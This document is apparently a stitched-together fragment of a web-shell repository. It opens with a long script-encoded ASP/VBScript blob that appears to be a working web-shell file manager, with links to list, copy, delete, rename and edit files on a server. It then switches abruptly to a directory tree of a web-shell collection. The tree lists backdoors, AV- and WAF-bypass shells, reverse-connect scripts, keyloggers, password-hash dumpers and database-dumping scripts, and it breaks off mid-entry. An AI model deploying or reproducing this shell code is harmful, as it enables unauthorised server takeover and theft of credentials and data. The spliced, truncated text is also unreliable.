YPWC1+xBm.blsE@*@!4@*zmDr\P9kM+^OKDX,xP,JPL~/hlMlh+O.P'Pr@!z(@*@!&6WxO@*@!4.@*@!8M@*E@#@&idkwP;(xD`J+ `/ hlDmh+DD+*~RP8#,@!@*P+~:tnx@#@&did8CMDl2GkPxP;( Yc&xkYD"+7cS0O`;KCMl:OD~SUcZqnmDC:nOM+bP ~F*~Ewr##~R,F@#@&i7i4C13^+\V,xPd+WYvZ KmDlsnYM+~(C.DmwK/b@#@&7id@#@&i7d"+d2Kx/n qDrY~r@!WKxDP0mmxBqkUo9kULkBPkry'Blv@*F@!z6WUY@*E,[~J@!8@*,@!WG YPWC1+xBm.blsEPkky'E+B@*@!CP4DnW{BJ,'P"+;!ndYc?D-+.#mDrl(s+k`Ej;IqKP|1)HAE*P',JQZhlMC:Y.+{J~',4l1VV\+^~'PrPEP@*P Lx8/aIP@!zWG Y@*~@!J4@*P@!&m@*@!(D@*J@#@&di3Vk+@#@&id7]/wKU/RMrO+,J@!0GxO~6l^+{vbxL[bxodv,/ryxE*v@*F@!z0KxD@*J,[~J@!4@*~@!0W OP6lmxvlMkmVvPdr.+xByv@*@!l~4M+0xvrP'P"n$EnkYc?+M\..mDrl(VndvJ?;]qhK{g)\2r#,[~J_/qnCDmh+DDnxMWWOv@*P RLU(/2p@!J0W Y@*@!z(@*@!zm@*@!8M@*J@#@&di2x9~rs@#@&id]+d2Kxd+c DbYn~r@!YC8^+~4K.9+.{Jr!JrP1nV^/2l1kUL{JJZEJ,m+^s2l9NbxL'EEZJEP@*E@#@&d7WKDPnC1t~0Ks9+.&Y:Pbx,)xmfrybxsnM@#@&i7@#@&I+k2Gxk+c.kOn,J@!YM@*@!DN~AbNY4xEGf]E@*r@#@&"+kwW / MkO+,J@!WKxY,Wl1+'EC.kmVEPdk"n{BqB@*~@!mP4.0'EE[JEPKU1Vr13{JJNl7C/1DrwD)[G1E:UYcWwUcBrPLP]+5;/ORUnD7+.#mDkC8^+d`rj;I(hK|1bt2rbPLPEgmmOrKx'nslkWDUrs[alDtxJ~',Inw^Cm`WG^N+.(D+hRaCDtSr-r~J-J*~[,Jv~,B/ hWw!2BBBhb[Ot{cZ!StnrTtO'2X!B/^.KVV8CM/x5AjBDnkk.l4^+EbJr@*@!0KxO~6lmxBqkxT[rxT/EPdk"n{B+B@*~@!(@*@!&(@*@!&WKxO@*@!&m@*' 4kwirP@#@&I/2W /n qDkDnPrP@!m~4D0{JEaEE,WUm^rm0'EENl\Cd1DrwDl9W^!:xYcWanxvBEPLP]n$E+kORU+D7n..mDbl8VndvJjZ"(n:{H)t2Jb~LPEgm^DkG 'aEYLwmOt{J~[,In2^lmc0KVN.(Y:cwCY4Sr-E~rkJ*P'~rB~~v;KWa;aBSEhbNY4'WT!BtnkTtOxW*!BdmMWV^8CDk'I2j~.nkk"l(s+E#EE@*P@!WG Y~0m^'vj+MNl lE~/byn'EFv@*,@!4@*@!P@!z4@*@!&sKxD@*@!zC@*Lx8/aIPLx8daiJ@#@&bs~:b[vH/m/~GB *~@!@*PEwHJ~P4+x=]+kwW dnRqDbYnPE/H4nDU2X,*~&,ZX8nMO lM.bW.crMoJ=IdwKxd+c2U[@#@&IdwKx/ DbYPE@!WG Y~0m^+{B r oNrUT/vPkr.+xE*E@*F@!z6GxD@*EPLPE@!(@*P@!WW YP6C^+{B:kh+d~g+AP"G:mxv~kkynxE&v@*@!C,t.0{BJ,[,]+$En/DRjnM\+M#lMkl(sn/vJUZ]qKP|1)HAE#,[~EQZKCMlh+D.'E,[,0W^N.qD+hRalO4,[Prv@*rP[,68LMK/O+.c6WsN.qD+h alY4b,[~J@!&m@*@!J4@*@!zDN@*@!Y9P-l^kLU{B4md+^kxv@*[ 4kwI[U8kwI@!JWW Y@*E@#@&IndaWU/ qDrD+,J@!JY9@*@!JY.@*r@#@&7i@#@&i7d +6D@#@&didi@#@&d7]/2W d+c.rD+PE@!JYC4^n@*@!8M@*@!Yl(V~4KD[+M'EEZJJ,^+^V/aC^k o{JEFEE,mnV^2l9NrUT'JETrJ~@*r@#@&d7:l(V+"+ Vfor/,'~OME+@#@&di0WM~nl1t,srVnd&Yn:Z~k P/G^sksnk!@#@&i7iko,Km4VIU3G+LkkPx~DDE~Y4+x@#@&7did~k.kU^bKC4^nIxV~{PJ~8TmGVK.{JE[!~!AZArEJ@#@&7di2sd@#@&i7diAkMrUmbKm4s+]n 3~',EJ@#@&77i2x[~bs@#@&bo,:r9`:N~8vB+#,@!@*PrDE~:t+ lI/wKUd+cMkO+~E;X8+MjwHPX~JPZz8DRm.MkGMR}Dor)"n/aWU/R3U9ddi@#@&"+/aGU/RqDrYn~r@!OD@*@!Y9J~',Ak.r mrKm8^+]x0P[,J@*@!0KxOPkk"n{B&E@*@!wWxD~Wl1+{B kUL9kUokv/bynxEcB@*+@!zWW O@*J',r(L+VWkO+M`ok^+d(D+:Z wmYt*~'J,@!JY[@*@!O9P-l^ro 'v8m/+sr +vJ,',ArMk mk:l(s+"+U3,[~E@*@!z(@*@!6WxD~Wl1+{BCDrC^B~/b"+{B+v@*[x8dai'x(daiE,[,sWM:mO1!:8+M`or^+/&O+s!Rkr"+JFZ *~~T*P'Pr'x(/2In4XOnk[U4k2p[U(/ai[ 4k2i@!zWW Y@*@!JYN@*@!Y9P\msro 'E4C/nsbxnBr~[,Ar.bxmrPm4s+"n 3~LPr@*[ 4k2iLx8/ai@!WKxY,Wl1+'EC.kmVEPdk"n{B+B@*@!l,t.n6'JE:rJ~W ^^k^0'rJLm\mdmMk2Y=NG^!:+ ORKw+ cvJ,[,In;;nkY ?.\D#CMkl8s/cJU/"qK:{gbHAJ*~[,J_l1YrG 'oO[alY4xEPLP"+2VC^`ok^n/&YnhZRwCO4~E-rSruE*PLPJE~,vZqnGw!wvSEhk9Ot{c!ZS4+bo4Yx&XTB/^DKsV(l.d{52jSM+dk.C(VnE#rJ@*@!0KUY,0Cm'v bxo9rxT/Bkr"+{BWB@* @!&6WUY@*/WaX@!&m@*@!&WKxO@*@!&DN@*@!Y9P\mVbLx{B8lk+sr +Br~[,AkMrUmbKm4s+]n 3~[,E@*Lx8dai[U8kwI[ 8kwILx(/wp@!6GxDPWl1+xvqkxT[k o/E~dk.+{B*B@*@!mP4DW'rJ:ErPWU^^k^3{ErLC7lkmDbwDlNKm;:xO Kw+ cBrP[,]n;!+kY ?n.7+..m.km4snk`Jj/"qKK|HzH3r#,[Prgm^YbWU'M+U'alY4xJ,[P"n2Vmm`oksnkqO+sTRalO4BJ-ESruE#,',JvBPEZhWa;wE~vhbNO4{c!ZStko4Ox&l!B/^DGs^4CDkx5A?S./k"C(VnB*Er@*@!J0KxY@*@!6GxDPWl1+xvmDkmsB,/k.nxByB@*b[fnrDk.@!JoW Y@*@!Jl@*@!&DN@*@!D[,\C^kTx'E4md+^kU+EJ~',AkMrx1kKm8s+"+ 3~[~E@*[U4k2iLx8dai[U8kwI[ 8kwI@!0KxY,0m^+{B-+MNCUmBPkry'Byv@*@!mP4Dn0xEraEJ,Gx1Vr^0'JE%m\C/1.bwO=NKmEs+ ORKwnxvBE~LPI5E/YcjnD7+M.CDrC(Vn/vE?;I(K:{1)\AJbPL~rgC1YbWx{Ns[alOt{J~',I+asl1+`wrs+kqD+h! 2mY4~rwJBJkE*P[~EE~~B; hW2!wE~BSk9Ot{cT!BtnrTtY{f!Z~/1.GV^4mDd'e3U~.+krym4snE#JE@*@!0GxD~6l^'Ek o9rxT/vPkk"n{BcE@*@!JsW O@*?bV@!zC@*@!&6WUY@*@!zDN@*@!DNP-C^kLx{v(ldVbx+EJ,'P~k.k mrPm4V]+ 3PL~E@*Lx(/2i'U(/2iLU4kwI' 4/2I@!0GxD~6l^'7+D9l CB,/ry'v+E@*@!m~tM+0{EEarJ,WUmsr13xJr%l7ld^MkwOl9W^Esn Y Kwx`EJ,'P"+5E/O U+D7nDjlDbC8V/vJjZ](hKm1z\2r#~',JgC^DkGx{PXY9K/Hlb1[6rV'EPLP]naVl1n`wkVd(Y:ZR2lO4BJwJBEur#~',JBS~EZ nK2!wvBBSkNDt{cZ~4+bo4O{c%ZS/1DW^s8lM/{53?S./rym8VBbEr@*@!WG Y~0m^'vqk oNbxTdB,/ry'vfE@*F@!&sKxY@*@!WW Y,0CmnxE\nD9CxmB~dby+xvyB@*b@!&wWUD@*@!zl@*@!JWW Y@*@!JY[@*@!YN,-l^ko xv4m/VrxnvrP'P~rDbx^r:l4sn"+U3,',J@*Lx(/wp[ 8/ai'x(/2ILx4k2i@!0W O~0mm'vrUTNrxTdB,/r"'B*v@*@!CP4.0xrJ[JJ,W ^VbmV'rJ%C7l/1.kaY)9G^Es+ Y W2n `vJ,'P"+5;/Y jD-+M#mDrm4^+/vJU/I&nP{gb\3r#PL~JQlmDrGx{KXY9Wdzm2[kD'0bVnxrP[~]wsl1nvsr^+kqY:Z wmY4~r-ESruJ*~[,JBB~vZqnKw;wvSEhrND4'FvTS4+kL4D'X ZSkm.KV^4lM/{e2U~.+kk"C(V+EbJr@*c@!&WW Y@*@!WWUO,0CmxB7+.[mxlv~kk"+{vyB@*GyxV@!JoW Y@*@!Jl@*@!JYN@*@!Y9P\msro 'E4C/nsbxnBr~[,Ar.bxmrPm4s+"n 3~LPr@*[ 4k2iLx8/ai'U(/wp'x(/wp@!WW Y,0CmnxE\nD9CxmB~dby+xvyB@*@!m~4Dn6'rJJ,[,]+$En/DRjnM\+M#lMkl(sn/vJUZ]qKP|1)HAE#,[~EQlmOrKxxk [bD'6k^+'rPL~Iwsl1+cobV+k(Y:!c2CY4~r-E~Ekr#~[,EJr@*@!WKxY~Wmmn'E bxL9k o/E/b"+{B*B@*@!&WKxY@*rx9kD@!&C@*@!z6WUY@*@!JY[@*@!&YM@*E@#@&ks~hbNcksLB%Sy#,@!@*,Jm.J,K4+ )]nkwW d+cDbOnPrZH4nDj2HPXPJ~|KN~eY3rdby^+,9kObDbVkHWME)"+dwKxdnc2x97d@#@&diPC4^+"+U39nTkdP{~1}K~Pm4Vn]xVfLb/@#@&diks,:b[`tZC/~{Sy#P@!@*PrwXr~Ptx=In/2G /nRq.kD+~E;X4n.UwzPl~JP/H4DOqlM.kKD rMoEl"+/aGxk+RAU[@#@&dixn6O@#@&d7@#@&7d"+d2Kx/n qDrY~r@!oKxDPsmmxBqkUo9kULkBPUry'B+v@*P,@!JsGxO@*r@#@&di]+kwGUk+R .bYnPrm|{m|{|{{|{|m{|{m{|{mm|{{|m{|{{|mm{|{|{m{mm|{m{|m{|{mm|{{mm|{m{|m|{m|{|{{|{|m{|J@#@&id]nkwW d+cDbOnPr@!JYC4sn@*J@#@&@#@&@#@&d7@#@&d2U[,ko@#@&3 N~UE(@#@&bs,hk9`Pl(VnSO~F*~@!@*PJr~Ptx=In/2G /nRq.kD+~E;X4n.UwzPl~JP/H4DOqlM.kKD rMoEl"+/aGxk+RAU[@#@&?!4~KC.mA;VvKD8~K.y#@#@&7}x~2M.KD~"+kE:Pgn6D@#@&dbs~Jx`h.F*P@*,T~K4+ @#@&d7eD~',KD8[Ewr@#@&77bs~5.,'~r-'JP:tUPI+.P{PEE@#@&di7wmD+ O~',Jr@#@&d77bs~q jYMIn-v5+.Sr-E#,@*,!~:tx@#@&di7wmDnxDPx~d+0Dc5D~,(U?DD"+-`enM~~J'E~,SnUv5+.b Fb#@#@&id3 N,ks@#@&i3Vk+@#@&idenMP',EJ@#@&dAU[Pbs@#@&7@#@&7U+OPgn/ +oj}P'~/M+CYG(Ln1YvJ?1Db2YbxLRwksnUX/Dn:}4L^OJ*@#@&dj+O~nldWMnMbY~x,1+dUsjrc!YoKV9+Dv5.#@#@&7?Y~W1P',FlkWD!rYcsbVn/@#@&iBJkkO+^+hn,xmndbP9xT[x~ mPKm4^nP:lL@#@&dv]/wKU/RMrO+,J@!0GxO~6l^+{Ak o[r o/~dbyn'+@*@!zoKxD@*bMlsCPUWUE^l.E@#@&dboP:l4^n~@!@*P:kOVn~:tnx=]+kwGUk+R .bYnPrCaDC.PnWxDDKs",Zz4Dj2HP*,&PnWN,enY0kkk"mn~G+rYb.k^kzGMRR E=In/aG /nc2 N@#@&d"n/aWU/R .bY+,E@!Dl4^n~hbNDtxBqTZ]vP(GD9+.xE!B~^Vswm[9kUT'EFB,msVkwCmbxLxEFB,8o1WVK.xB[v+vvv@*J@#@&i@#@&isG.,2l^4,0qP&U,0^@#@&i@#@&id;z4D lMDrGM{bMC|MkY.~',I;;+dOcsGDscJ;X8nMl..bW.{z.m|.bYDJ*@#@&7dbs~ZH4n.qlDMrWM{bMCFDbYD~'~EzNrk1rx9+).mJPP4x@#@&i7iko,k /YM`^^lk+c08RUCs+#Bsmm/+vK. *#,Y4+U~@#@&7dirs,KC8^+P@!@*,KrY^n,K4x=I+kwKU/R DbYn~rlwMCy,|W O.W^",Zz4n.UwzPl~z,|G[,5+OVb/ry1n,fnbYbDk^kHGDcR J=IndaWxknRAxN@#@&7diNKhU?O.,'~J@!WW Y~Wmm+xA4[k LkPdby'*@*@!m~tM+W'EJ'j1DkaOb9[JQKCDm:Y.+xR2[eW^H+9k.xr[0q alOtLEE@*@!Jl@*@!z6W O@*r@#@&did[GSx/D.P{P08 2lDt@#@&7d7]/2W d+c.rD+PE@!DD~4T^KVGM'Ea&2&2f&E@*EP@#@&77iks,hk9`ksLS%B *P@!@*~EmDEP:4+ )]nkwWUdR DbOPE;X(+DUwH~*,z~|KN~eY3bdk.m+,9nkDkMkskzGMJlIdwKxdnc2x[@#@&d7d"nkwG /RMkDnPr@!ON@*J~',J@!m~tM+0{EEarJ,WUmsr13xJr%l7ld^MkwOl9W^Esn Y Kwx`EJ,'P"+5E/O U+D7nDjlDbC8V/vJjZ](hKm1z\2r#~',JgC^DkGx{LY'alDt'rPL~Iwsl1+c[KhxkODBJ-rSEur#,[~JvS,B/hGw!wvSEhk[O4'*!ZS4+rTtD' Z!BdmMWsV(l.d{52USD/k.C8VB*JE@*@!WKxOP6Cm'v bxo[r odBkr.+xEcE@* @!z6GxD@*/WaX@!&m@*JL~J@!zY9@*E@#@&didvIndaWU/ MkOn,J@!O[@*J~[,E@!l~4D0'rJ[EJ,WUm^k^V{JJNC\m/mMr2Y=NKm;:nUDRGwU`EJ~',I+5;/ORUnM\nM.mDkm4^n/vJjZ"qKP|1bt3J*P[,E_l1YbWU'.n [2lD4'rP'~"+wsC1+cNKA /OM~r-JBJ-E#,[~JE~~v;nK2EaB~EArNDt{cT!S4kLtDx Z!Sd1DWss(l./{eA?SM+kkym4^nB*JE@*@!0GUDP0m^+{BbULNbxT/vPdr.+xBWv@*@!zWG Y@*@!WKxOP6C1+xElMkl^B,dk.+xByB@*)9f+bOkM@!zwGUY@*@!Jl@*J'E@!zON@*E@#@&d77"+/2G /nRq.bYn,J@!YN@*J,'Pr@!CP4DnW{JJ[EJ,Wx1srm0'rJ%l-Ckm.kaO)9W^;s+xO KwnxvvrP',I;E/D ?D-+M.C.bl4^n/vJ?;](n:{gb\2Eb,[~JQCmDkG
gitextract_dl1ys0kh/ ├── .github/ │ └── FUNDING.yml ├── .gitmodules ├── 0xAbbarhSF/ │ └── CTF-WebShells-/ │ └── README.md ├── 138shell/ │ ├── A/ │ │ ├── Ajan.asp.txt │ │ ├── Ajax_PHP Command Shell.txt │ │ ├── Antichat Shell v1.3.txt │ │ ├── Asmodeus v0.1.pl.txt │ │ ├── Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt │ │ ├── aZRaiLPhp v1.0.txt │ │ └── accept_language.txt │ ├── B/ │ │ ├── Blind Shell.cpp.txt │ │ ├── backdoor1.txt │ │ ├── backdoorfr.txt │ │ ├── backup.php.txt │ │ ├── backupsql.php.txt │ │ └── backupsql.txt │ ├── C/ │ │ ├── CMD.asp.txt │ │ ├── Casus15.php.txt │ │ ├── CmdAsp.asp.txt │ │ ├── Crystal.txt │ │ ├── CyberSpy5.Asp.txt │ │ ├── c100.txt │ │ ├── c2007.php.txt │ │ ├── c99(1).php.txt │ │ ├── c99.txt │ │ ├── cgi-python.py.txt │ │ ├── connectback2.pl.txt │ │ ├── ctt_sh.php.txt │ │ ├── ctt_sh.txt │ │ ├── cybershell.php.txt │ │ └── cybershell.txt │ ├── D/ │ │ ├── DTool Pro.txt │ │ ├── Dive Shell 1.0 - Emperor Hacking Team.txt │ │ ├── Dx.php.txt │ │ ├── Dx.txt │ │ ├── DxShell_hk.php.txt │ │ └── dC3 Security Crew Shell PRiV.txt │ ├── E/ │ │ ├── EFSO_2.asp.txt │ │ ├── Elmali Seker.asp.txt │ │ └── elmaliseker.asp.txt │ ├── F/ │ │ ├── Fatalshell.php.txt │ │ └── fuckphpshell.txt │ ├── G/ │ │ ├── GFS web-shell ver 3.1.7 - PRiV8.txt │ │ ├── gfs_sh.php.txt │ │ └── gfs_sh.txt │ ├── H/ │ │ └── h4ntu shell [powered by tsoi].txt │ ├── I/ │ │ ├── Inderxer.asp.txt │ │ ├── iMHaPFtp.php.txt │ │ ├── iMHaPFtp.txt │ │ ├── img.php.txt │ │ ├── indexer.asp.txt │ │ └── ironshell.txt │ ├── J/ │ │ ├── Java Shell.js.txt │ │ └── JspWebshell 1.2.txt │ ├── K/ │ │ ├── KAdot Universal Shell v0.1.6.html.txt │ │ └── Klasvayv.asp.txt │ ├── L/ │ │ ├── Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.txt │ │ ├── lamashell.txt │ │ ├── load_shell.php.txt │ │ ├── load_shell.txt │ │ └── lurm_safemod_on.cgi.txt │ ├── M/ │ │ ├── Moroccan Spamers Ma-EditioN By GhOsT.txt │ │ ├── MySQL Web Interface Version 0.8.txt │ │ ├── Mysql interface v1.0.txt │ │ ├── mailer3.php.txt │ │ ├── matamu.txt │ │ ├── myshell.php.txt │ │ ├── mysql.php.txt │ │ ├── mysql_shell.txt │ │ └── mysql_tool.php.txt │ ├── N/ │ │ ├── NCC-Shell.txt │ │ ├── NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.txt │ │ ├── NT Addy.asp.txt │ │ ├── NetworkFileManagerPHP.txt │ │ ├── Nshell (1).php.txt │ │ ├── network.php.txt │ │ ├── nshell.php.txt │ │ ├── nstview.php.txt │ │ └── ntdaddy.asp.txt │ ├── P/ │ │ ├── PH Vayv.php.txt │ │ ├── PHANTASMA.txt │ │ ├── PHP Backdoor Connect.pl.txt │ │ ├── PHP Shell.php.txt │ │ ├── PHPRemoteView.txt │ │ ├── Phyton Shell.py.txt │ │ ├── Private-i3lue.txt │ │ ├── pHpINJ.php.txt │ │ ├── perlbot.pl.txt │ │ ├── php-backdoor.txt │ │ ├── php-include-w-shell.txt │ │ ├── phpbackdoor15.txt │ │ ├── phpjackal.txt │ │ ├── phpshell17.txt │ │ ├── phvayv.php.txt │ │ ├── pws.php.txt │ │ ├── pws.txt │ │ └── ru24_post_sh.txt │ ├── R/ │ │ ├── Rader.asp.txt │ │ ├── Rem Exp.asp.txt │ │ ├── Rem View.php.txt │ │ ├── Russian.php.txt │ │ ├── r57 Shell.php.txt │ │ ├── r57.php.txt │ │ ├── r577.php.txt │ │ ├── rootshell.txt │ │ └── ru24_post_sh.php.txt │ ├── README.md │ ├── S/ │ │ ├── Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt │ │ ├── Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.txt │ │ ├── Server Variables.asp.txt │ │ ├── SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.txt │ │ ├── SimShell 1.0 - Simorgh Security MGZ.txt │ │ ├── Sincap.php.txt │ │ ├── SnIpEr_SA Shell.txt │ │ ├── s.php.txt │ │ ├── s72 Shell v1.1 Coding.txt │ │ ├── shell.php.txt │ │ ├── shellbot.pl.txt │ │ ├── simple-backdoor.txt │ │ ├── simple_cmd.txt │ │ ├── smtpd.py.txt │ │ ├── spy.php.txt │ │ └── sql.php.txt │ ├── T/ │ │ ├── Test.php.txt │ │ ├── Tool.asp.txt │ │ ├── telnet.cgi.txt │ │ ├── telnet.pl.txt │ │ └── telnetd.pl.txt │ ├── U/ │ │ └── Uploader.php.txt │ ├── W/ │ │ ├── WebShell.cgi.txt │ │ ├── WinX Shell.txt │ │ ├── Worse Linux Shell.txt │ │ ├── w.php.txt │ │ ├── w3d.php.txt │ │ ├── w4k.php.txt │ │ ├── wacking.php.txt │ │ └── webshell.txt │ ├── X/ │ │ └── xinfo.php.txt │ └── Z/ │ ├── Zehir 4.asp.txt │ ├── zacosmall.php.txt │ ├── zacosmall.txt │ └── zehir4.asp.txt ├── Backdoor Dev Shells/ │ ├── Source/ │ │ ├── devilzShell.asp │ │ ├── devilzShell.aspx │ │ ├── devilzShell.cgi │ │ ├── devilzShell.jsp │ │ └── devilzShell.php │ ├── devshell.asp │ ├── devshell.aspx │ ├── devshell.cfm │ ├── devshell.cgi │ ├── devshell.jsp │ ├── devshell.php │ └── readme.md ├── Behinder/ │ ├── readme.md │ ├── shell-2021-03-18.php │ ├── shell-2021-04-23.php │ ├── shell.asp │ ├── shell.aspx │ ├── shell.jsp │ ├── shell.php │ ├── shell2020-12-06.php │ └── 简单的冰蝎流量魔改.md ├── Godzilla/ │ ├── 123.ashx │ ├── 123.asmx │ ├── 123.aspx │ ├── 123.jsp │ ├── 123.jspx │ ├── 123.php │ ├── 20220213.php │ ├── 20220213_02.php │ ├── 20220213_03.php │ └── Godzilla-BypassOpenRasp.jar ├── LICENSE ├── README.md ├── README_EN.md ├── README_TR.md ├── SECURITY.md ├── _config.yml ├── antSword/ │ └── mybase.md ├── antSword-shells/ │ ├── README.md │ ├── WebLogic_Shiro.md │ ├── jsp_custom_script_for_oracle.jsp │ ├── jsp_custom_spy_for_mysql.jsp │ ├── jspx_custom_script_for_mysql.jspx │ ├── php1.php │ ├── php2.php │ ├── php3.php │ ├── php_assert.php │ ├── php_create_function.php │ ├── php_custom_script_for_mysql_fix.php │ ├── php_custom_spy_for_mysql.php │ └── python2_custom_script.py ├── asp/ │ ├── 08小组内部交流专用.asp.txt │ ├── 1d.asp │ ├── 2013110125027897.asp │ ├── 2022-08-12.aspx.txt │ ├── 404.asp │ ├── 80sec内部专用过世界杀软休积最小功能超强超猛宇宙第一asp.txt │ ├── ASPXspy2.aspx │ ├── ASP一句话.txt │ ├── ASP一句话02.txt │ ├── Ajan.asp │ ├── Asp最新变形一句话.asp │ ├── Asp最新变形一句话2014-11-21.asp.md │ ├── Cmd支持管理员登陆的webshell.asp │ ├── CyberSpy5.Asp │ ├── DarkBlade1.5.asp │ ├── EFSO_2.asp │ ├── Expdoor.com ASP专用小马.asp │ ├── Inderxer.asp │ ├── RadHat-webshell-del-backdoor/ │ │ ├── 加密版.asp │ │ └── 明文版.asp │ ├── Rader.asp │ ├── RemExp.asp │ ├── Server Variables.asp │ ├── ajn.asp │ ├── ajs/ │ │ ├── readme.md │ │ ├── shell.asp │ │ └── shell_decoded.asp │ ├── aspydrv.asp.txt │ ├── base.asp │ ├── bypass-all.asp │ ├── bypass-iisuser-p.asp │ ├── bypass-waf.asp │ ├── bypass_safedog_01.asp │ ├── bypass_safedog_02.asp │ ├── bypass_safedog_03.asp │ ├── class-initialize.asp │ ├── class-terminate.asp │ ├── cmd.asp.txt │ ├── cmd提权马.asp │ ├── con2.asp │ ├── cpanel.asp │ ├── create-activex-object.asp │ ├── execute-session.asp │ ├── glorysday.asp │ ├── good_1.asp │ ├── grasp.asp │ ├── hididi.net.txt │ ├── ice.asp │ ├── killdoor.txt │ ├── klasvayv.asp │ ├── lpl38-com-RedHat/ │ │ ├── radhat.asp │ │ ├── readme.txt │ │ └── 解包unpack.vbs │ ├── lpl38-com-redhat.asp.txt │ ├── luoss.asp.txt │ ├── mumaasp.com.asp │ ├── nonoseed0121.asp.txt │ ├── r00ts无FSO组建大马.asp │ ├── shell.asp │ ├── test.asp.txt │ ├── use-html-annotator-bypass.asp │ ├── utf7-bypass.asp │ ├── vbencode-bypass.asp │ ├── vps提权马.asp │ ├── webshell.asp │ ├── xslt.asp │ ├── xx.asp │ ├── 不带引号的Asp一句话.asp │ ├── 不灭之魂.asp │ └── 传说中的hcker.asp.txt ├── aspx/ │ ├── .NET WebShell 免杀系列之Unicode编码.md │ ├── 111.aspx │ ├── 2013110125222650.aspx │ ├── ASPXspy2.aspx │ ├── ASPX一句话 │ ├── ASPX一句话02.txt │ ├── AspxSpy2014Final.aspx │ ├── Aspx一句话木马小集.aspx │ ├── Nightrunner.aspx%20.txt │ ├── a.aspx │ ├── a1.aspx │ ├── a3.aspx │ ├── abcd.aspx │ ├── as.ashx │ ├── asp.net-backdoors/ │ │ ├── ChangeLog.txt │ │ ├── cmdexec.aspx │ │ ├── filesystembrowser.aspx │ │ ├── fileupload.aspx │ │ ├── spexec.aspx │ │ └── sql.aspx │ ├── aspx下嗅探工具websniff1.0-linux.aspx │ ├── aspx变形一句话.aspx │ ├── con2.aspx │ ├── editor.aspx │ ├── httpHandlers_backdoor/ │ │ ├── Customize.cs │ │ ├── global.asax │ │ ├── httpHandlers.md │ │ ├── httpModules.md │ │ └── readme.md │ ├── icesword.aspx │ ├── lpl38-com-aspx.txt │ ├── nishang/ │ │ ├── .gitattributes │ │ ├── .gitignore │ │ ├── Antak-WebShell/ │ │ │ ├── Readme.md │ │ │ └── antak.aspx │ │ ├── Backdoors/ │ │ │ ├── DNS_TXT_Pwnage.ps1 │ │ │ ├── Execute-OnTime.ps1 │ │ │ └── HTTP-Backdoor.ps1 │ │ ├── CHANGELOG.txt │ │ ├── Escalation/ │ │ │ ├── Enable-DuplicateToken.ps1 │ │ │ └── Remove-Update.ps1 │ │ ├── Execution/ │ │ │ ├── Download-Execute-PS.ps1 │ │ │ ├── Download_Execute.ps1 │ │ │ ├── Execute-Command-MSSQL.ps1 │ │ │ └── Execute-DNSTXT-Code.ps1 │ │ ├── Gather/ │ │ │ ├── Check-VM.ps1 │ │ │ ├── Copy-VSS.ps1 │ │ │ ├── Credentials.ps1 │ │ │ ├── FireBuster.ps1 │ │ │ ├── FireListener.ps1 │ │ │ ├── Get-Information.ps1 │ │ │ ├── Get-LSASecret.ps1 │ │ │ ├── Get-PassHashes.ps1 │ │ │ ├── Get-WLAN-Keys.ps1 │ │ │ └── Keylogger.ps1 │ │ ├── Misc/ │ │ │ └── Speak.ps1 │ │ ├── Pivot/ │ │ │ ├── Create-MultipleSessions.ps1 │ │ │ └── Run-EXEonRemote.ps1 │ │ ├── Prasadhak/ │ │ │ └── Prasadhak.ps1 │ │ ├── README.md │ │ ├── Scan/ │ │ │ ├── Brute-Force.ps1 │ │ │ └── Port-Scan.ps1 │ │ ├── Utility/ │ │ │ ├── Add-Exfiltration.ps1 │ │ │ ├── Add-Persistence.ps1 │ │ │ ├── Base64ToString.ps1 │ │ │ ├── Do-Exfiltration.ps1 │ │ │ ├── Download.ps1 │ │ │ ├── ExetoText.ps1 │ │ │ ├── Invoke-Decode.ps1 │ │ │ ├── Invoke-Encode.ps1 │ │ │ ├── Parse_Keys.ps1 │ │ │ ├── Remove-Persistence.ps1 │ │ │ ├── StringToBase64.ps1 │ │ │ └── TexttoExe.ps1 │ │ ├── nishang.psm1 │ │ └── powerpreter/ │ │ ├── Powerpreter.psm1 │ │ └── README.md │ ├── web.config │ ├── wooyun2015052301.aspx │ ├── wso.aspx │ ├── xslt.aspx │ └── z1(1).txt ├── b4tm4n-toolz/ │ ├── README.md │ ├── backconnect/ │ │ ├── back.h │ │ ├── back.java │ │ ├── back.js │ │ ├── back.php │ │ ├── back.pl │ │ ├── back.py │ │ ├── back.rb │ │ └── list.json │ └── database/ │ ├── adminer-4.5.0.php │ └── list.json ├── bt_yincang_shell.md ├── bypass.md ├── caidao-shell/ │ ├── 3802.php │ ├── 404.php │ ├── Customize.soap │ ├── README.md │ ├── a.asp │ ├── bypass01.php │ ├── caidao-plug/ │ │ ├── ASP读终端端口.ccc │ │ ├── Aspx文件搜索.ccc │ │ ├── Aspx设置权限.ccc │ │ ├── PHP批量挂马.ccc │ │ ├── README.md │ │ ├── asp目录写权限检测.ccc │ │ ├── php_HTTP代理.ccc │ │ ├── phpspy2011.ccc │ │ ├── php端口转向.ccc │ │ └── 扫描端口_php.ccc │ ├── customize.ashx │ ├── customize.asmx │ ├── cutstomize.asp │ ├── download 下载文件.asp │ ├── fuck.php │ ├── guest.jsp │ ├── guo.php │ ├── hkmjj.asp │ ├── ice.asp │ ├── ice.aspx │ ├── ice.cfm │ ├── ice.jsp │ ├── ice.php │ ├── m7lrv01.php │ ├── mdb.asp │ ├── p.php │ ├── qun01.php │ ├── redirect.asp │ ├── short_shell.md │ ├── sqzr.php │ ├── tie01.asp │ ├── toby57解析加密一句话木马.php │ ├── w-ob_start01.php │ ├── w-ob_start02.php │ ├── w.jsp │ ├── w.jspx │ ├── w.php │ ├── w01.asp │ ├── w01.php │ ├── w02.asp │ ├── w02.jsp │ ├── w02.php │ ├── w03.asp │ ├── w03.jsp │ ├── w_2016-05-25.php │ ├── x.php │ ├── z-2016-01-05.php │ ├── 强悍.php │ ├── 菜刀jsp修改.jsp │ └── 说明.log ├── content/ │ ├── Webshell免杀的思考与学习 - 先知社区.mhtml │ ├── readme.md │ └── webshell-detect-bypass ├── cseroad/ │ ├── README.md │ └── Webshell_Generate-1.1.jar ├── docs/ │ ├── README.md │ ├── _config.yml │ └── webshell.md ├── drag/ │ ├── MSSQL.asp │ ├── README.md │ ├── asp wget drag database.asp.txt │ ├── jsp wget drag database.jsp.txt │ ├── mysql_1.php │ ├── mysql_jsp脱裤.txt │ ├── mysql数据库脱单个表.jsp │ ├── oracle_jsp脱裤.txt │ ├── oracle脱裤脚本.jsp │ ├── php wget drag database.php 2.txt │ ├── php wget 